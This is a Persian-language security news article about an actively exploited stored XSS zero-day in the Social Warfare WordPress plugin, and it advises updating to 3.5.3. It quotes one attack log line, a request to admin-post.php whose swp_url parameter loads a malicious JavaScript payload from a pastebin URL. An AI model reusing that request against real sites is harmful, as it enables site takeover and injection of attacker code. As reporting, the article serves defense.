امکان تسخیر سایتهای وردپرسی با آسیبپذیری روز صفرم XSS در پلاگین Social Share
محققان اخیراً آسیبپذیری حیاتی روزصفرمی را در پلاگین اشتراکگذاری اجتماعی وردپرس، به نام "Social Warfare" کشف نمودهاند که به هکرها اجازه میدهد اسکریپتهای مخرب را به سایتهای وردپرسی آسیبپذیر تزریق نمایند. این آسیبپذیری در واقع یک نقص XSS ذخیره شده در پلاگین مذکور است که وبسایتهای وردپرسی را در معرض خطر هک قرار میدهد.
Social Warfare، یک پلاگین اشتراکگذاری اجتماعی برای وردپرس است که توسط Warfare Plugins توسعه داده شده و به اشتراکگذاری اجتماعی بیشتر برای توسعهدهندگان وبسایتهای مبتنی بر وردپرس کمک میکند که میتواند منجر به بالا رفتن ترافیک وبسایت گردد.
این پلاگین حاوی یک کد آسیبپذیر در برخی از ویژگیهای دیباگینگ پلاگین است که اجازه میدهد پیلود مورد نظر در پایگاه داده سایت ذخیره شده و با هر درخواستی که برای مشاهده هر یک از صفحات ارسال میگردد بازیابی شود.
به گفتهی محققی به نام Sucuri، "قابلیت مذکور در هیچ جا به طور مستقیم استفاده نمیشود، و به پارامترهای مختلف $_GET برای اجرا وابسته است، این امر موجب میگردد اگر سایت شما با استفاده از این آسیبپذیری مورد حمله قرار گرفت به راحتی قابل دیدن باشد."
این آسیبپذیری روزصفرم بسیار جدی بوده و امکان به دست گرفتن کامل وبسایت آسیبپذیر را در محیط مرورگر برای مهاجمان فراهم میآورد.
مهاجمان در حال حاضر سوءاستفاده از این آسیبپذیری را آغاز نموده و تعداد زیادی اکسپلویت را در سراسر جهان توزیع نمودهاند.
همانطور که در زیر مشاهده میشود، تلاشهای بسیاری از صدها آدرس IP برای سوءاستفاده از این آسیبپذیری صورت گرفته است:
۲۰۲.۲۵۴.۲۳۶.۴۹ - - [۲۱/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
در این مورد، مهاجمان اسکریپتهای جاوااسکریپت را از طریق بارگذاری آدرس زیر:
https://pastebin.com/raw/0yJzqbYf
که حاوی پیلود مخرب است تزریق مینمایند.
اگر وبسایت در مقابل آسیبپذیری مذکور وصله نگردد، مهاجمان با استفاده از قابلیتهای این حفره امنیتی حملات گستردهای را علیه وبسایتهای آسیبپذیر اجرا مینمایند.
۷۰،۰۰۰ وبسایت وجود دارند که به طور فعالانه از این پلاگین استفاده میکنند، وصله مربوطه برای این آسیبپذیری منتشر شده و اکیداً به کاربران توصیه میگردد که در اسرع وقت این پلاگین را به نسخه ۳.۵.۳ بروزرسانی نمایند.
منبع خبر: https://gbhackers.com/zero-day-stored-xss-vulnerability/